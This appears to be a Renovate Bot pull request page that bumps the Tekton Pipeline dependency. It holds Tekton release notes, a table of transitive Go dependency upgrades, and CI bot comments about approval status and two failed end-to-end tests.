• ✨ Add support for consuming whole array results in matrix (#​6603)

TEP-0090: Pipeline Tasks may now reference whole array results in a Matrix. See https://github.com/tektoncd/pipeline/blob/09d422cff057f67170b4c2f76097ac6ffded33ef/docs/matrix.md?specifying-results-in-a-matrix#specifying-results-in-a-matrix docs for more information.

• ✨ [TEP-0135] Purge finalizer and delete PVC (#​6940)
• ✨ [TEP-0135] coschedule isolate pipelinerun (#​6929)
• ✨ TEP-0135: implement per-pipelinerun coscheduling (#​6819)
• ✨ Change ordering of ResolveResultRefs/ApplyTaskResults (#​6792)

Fixes

• 🐛 Add validation for feature-flags configmap to webhook (#​6935)

Added validation for feature-flags configmap

• 🐛 Fix units for metric taskrun_pod_latency (#​6891)

Bug fix: taskruns_pod_latency metric renamed to taskruns_pod_latency_milliseconds and units corrected

• 🐛 Perform webhook validation for remote pipelines (#​6887)

bug fix: Remote Pipelines do not support propagated parameters and workspaces

• 🐛 Fix PipelineRun reconciler panic for computed timeouts (#​6886)

bug fix: Avoid controller panics for computed timeouts

• 🐛 Fail PipelineRun when it can't create Runs (#​6866)

bug fix: PipelineRun marked as failed when it cannot create TaskRuns or CustomRuns for a non-retryable reason

• 🐛 Use the same validation for all taskrefs (#​6854)

bug fix: Disallow taskref.name with taskref.resolver in pipeline tasks

• 🐛 merge podTemplates instead of overriding (#​6850)

Merge podTemplate specified in pipelineRun.spec.taskRunSpecs[].podTemplate along with pipelineRun.spec.podTemplate instead of only considering the one specified at the taskRunSpecs.

• 🐛 Fix workingdirinit step for Windows tasks (#​6820)

Fixed an issue where Windows tasks would fail if one or more steps were configured with a custom working directory.

• 🐛 Fail upgrade tests when test script fails (#​6871)
• 🐛 Restore Upgrade Test Scenario2 by creating simple Task and Pipeline resources (#​6855)
• 🐛 Fix release pipeline (#​6849)
• 🐛 Fix flake of TestPipelineTaskTimeout (#​6955)
• 🐛 Fix flaky Affinity Assistant test (#​6925)

Misc

• 🔨 Move feature flags testing functions into testing package (#​6933)

Some exported functions moved from pkg/apis/config to pkg/apis/config/testing

• 🔨 cleaning up config-artifact-* (#​6902)

config-artifact-pvc and config-artifact-bucket are deleted as resources from the tekton-pipelines-controller role.
CONFIG_ARTIFACT_PVC_NAME and CONFIG_ARTIFACT_BUCKET_NAME are deleted from the tekton-pipelines-controller deployment.

• 🔨 Bump knative/pkg to 1.10 (#​6907)

native/pkg is updated to v1.10

• 🔨 [TEP-0137] Rename customrun package (#​6884)

The CustomRun events controller has been moved to the pkg/reconciler/notifications package.

• 🔨 Replace redundant function CheckAlphaOrBetaFields (#​6934)
• 🔨 Delete .ko.yaml (#​6931)
• 🔨 Fix typo in AffinityAssistantBehavior (#​6930)
• 🔨 Deduplicate examples tests between v1 and v1beta1 (#​6908)
• 🔨 Reduce spam in integration test logs (#​6873)
• 🔨 Remove yaml tests (#​6872)
• 🔨 Add Testing: Failed Matrix PipelineRun for Out Of Bounds Array Indexing Results (#​6852)
• 🔨 Refactor failure logic in pipelinerun resolution (#​6801)
• 🔨 Bump k8s.io/api from 0.26.6 to 0.26.7 in /test/custom-task-ctrls/wait-task-beta (#​6951)
• 🔨 Fix logger Fatalf message (#​6946)
• 🔨 Do not require enable-api-fields=alpha for spire (#​6939)
• 🔨 Bump github.com/sigstore/sigstore from 1.6.5 to 1.7.1 (#​6912)
• 🔨 Bump github.com/spiffe/spire-api-sdk from 1.6.3 to 1.7.0 (#​6911)
• 🔨 Bump github.com/opencontainers/image-spec from 1.1.0-rc3 to 1.1.0-rc4 (#​6910)
• 🔨 Bump google.golang.org/grpc from 1.55.0 to 1.56.2 (#​6904)
• 🔨 Ignore SA in assertion (#​6898)
• 🔨 Add upgrade test against previous server version to prevent regressions (#​6896)
• 🔨 Bump golang.org/x/sync from 0.2.0 to 0.3.0 (#​6880)
• 🔨 Bump github.com/tektoncd/pipeline from 0.48.0 to 0.49.0 in /test/custom-task-ctrls/wait-task-beta (#​6853)
• 🔨 Bump k8s.io/api from 0.26.5 to 0.26.6 in /test/custom-task-ctrls/wait-task-beta (#​6835)
• 🔨 Bump k8s.io/client-go from 0.25.10 to 0.25.11 in /test/custom-task-ctrls/wait-task-beta (#​6834)
• 🔨 Improve taskref_test coverage with more error test cases (#​6813)
• 🔨 formating error (#​6795)

Docs

• 📖 [RFC] Increase support window for v1beta1 CRDs to 1 year (#​6923)

Support window for beta CRDs increased to 1 year

• 📖 Mark v1beta1 apis as deprecated (#​6876)

action required: v1beta1 Task, TaskRun, Pipeline, and PipelineRun APIs are deprecated and will be removed. Please migrate to the v1 versions of these APIs following the migration guide at https://github.com/tektoncd/pipeline/blob/main/docs/migrating-v1beta1-to-v1.md.

• 📖 Document that Workspaces can be unused (#​6917)
• 📖 documenting the latest patch release - v0.44.4 (#​6895)
• 📖 updating releases with 0.47.3 (#​6875)
• 📖 Add set-security-context to feature flags docs (#​6865)
• 📖 Add compatibility policy for ResolutionRequests (#​6864)
• 📖 Update releases.md (#​6851)
• 📖 Add instructions for picking commit in the release ([#​6735](https://redire

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR has been generated by Renovate Bot.

[redhat-renovate-bot]

ℹ Artifact update notice

File name: modules/tests/go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

• 34 additional dependencies were updated

Details:

Package	Change
k8s.io/api	v0.25.2 -> v0.27.1
k8s.io/apimachinery	v0.25.2 -> v0.27.3
knative.dev/pkg	v0.0.0-20221003153827-158538cc46ec -> v0.0.0-20230718152110-aef227e72ead
github.com/containerd/stargz-snapshotter/estargz	v0.11.0 -> v0.14.3
github.com/docker/cli	v20.10.12+incompatible -> v24.0.0+incompatible
github.com/docker/docker-credential-helpers	v0.6.4 -> v0.7.0
github.com/go-kit/log	v0.1.0 -> v0.2.0
github.com/go-logfmt/logfmt	v0.5.0 -> v0.5.1
github.com/go-logr/logr	v1.2.3 -> v1.2.4
github.com/go-openapi/jsonpointer	v0.19.5 -> v0.19.6
github.com/go-openapi/jsonreference	v0.19.6 -> v0.20.2
github.com/go-openapi/swag	v0.21.1 -> v0.22.3
github.com/google/gnostic	v0.5.7-v3refs -> v0.6.9
github.com/google/go-containerregistry	v0.8.1-0.20220216220642-00c59d91847c -> v0.16.1
github.com/hashicorp/golang-lru	v0.5.4 -> v1.0.2
github.com/imdario/mergo	v0.3.12 -> v0.3.13
github.com/klauspost/compress	v1.14.4 -> v1.16.5
github.com/matttproud/golang_protobuf_extensions	v1.0.2-0.20181231171920-c182affec369 -> v1.0.4
github.com/opencontainers/image-spec	v1.0.3-0.20220114050600-8b9d41f48198 -> v1.1.0-rc4
github.com/prometheus/client_golang	v1.12.1 -> v1.14.0
github.com/prometheus/client_model	v0.2.0 -> v0.3.0
github.com/prometheus/common	v0.32.1 -> v0.37.0
github.com/prometheus/procfs	v0.7.3 -> v0.8.0
github.com/sirupsen/logrus	v1.8.1 -> v1.9.3
github.com/vbatts/tar-split	v0.11.2 -> v0.11.3
go.opencensus.io	v0.23.0 -> v0.24.0
go.uber.org/atomic	v1.9.0 -> v1.10.0
google.golang.org/api	v0.70.0 -> v0.138.0
google.golang.org/genproto	v0.0.0-20230410155749-daa745c078e1 -> v0.0.0-20230803162519-f966b187b2e5
k8s.io/apiextensions-apiserver	v0.24.4 -> v0.26.5
k8s.io/klog/v2	v2.70.2-0.20220707122935-0990e81f1a8f -> v2.100.1
k8s.io/kube-openapi	v0.0.0-20220328201542-3ee0da9b0b42 -> v0.0.0-20230515203736-54b630e78af5
k8s.io/utils	v0.0.0-20220728103510-ee6ede2d64ed -> v0.0.0-20230505201702-9f6742963106
sigs.k8s.io/json	v0.0.0-20220713155537-f223a00ba0e2 -> v0.0.0-20221116044647-bc3834ca7abd

[openshift-ci]

[APPROVALNOTIFIER] This PR is NOT APPROVED

This pull-request has been approved by: redhat-renovate-bot
Once this PR has been reviewed and has the lgtm label, please assign ksimon1 for approval. For more information see the Code Review Process.

The full list of commands accepted by this bot can be found here.

Needs approval from an approver in each of these files:

• OWNERS

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

[kubevirt-bot]

[APPROVALNOTIFIER] This PR is NOT APPROVED

This pull-request has been approved by:
Once this PR has been reviewed and has the lgtm label, please assign ksimon1 for approval. For more information see the Kubernetes Code Review Process.

The full list of commands accepted by this bot can be found here.

Needs approval from an approver in each of these files:

• OWNERS

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

[openshift-ci]

@redhat-renovate-bot: The following tests failed, say /retest to rerun all failed tests or /retest-required to rerun all mandatory failed tests:

Test name	Commit	Details	Required	Rerun command
ci/prow/e2e-tests-cluster-scope	6a6cf64	link	true	/test e2e-tests-cluster-scope
ci/prow/e2e-tests-namespace-scope	6a6cf64	link	true	/test e2e-tests-namespace-scope

Full PR test history. Your PR dashboard.

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes-sigs/prow repository. I understand the commands that are listed here.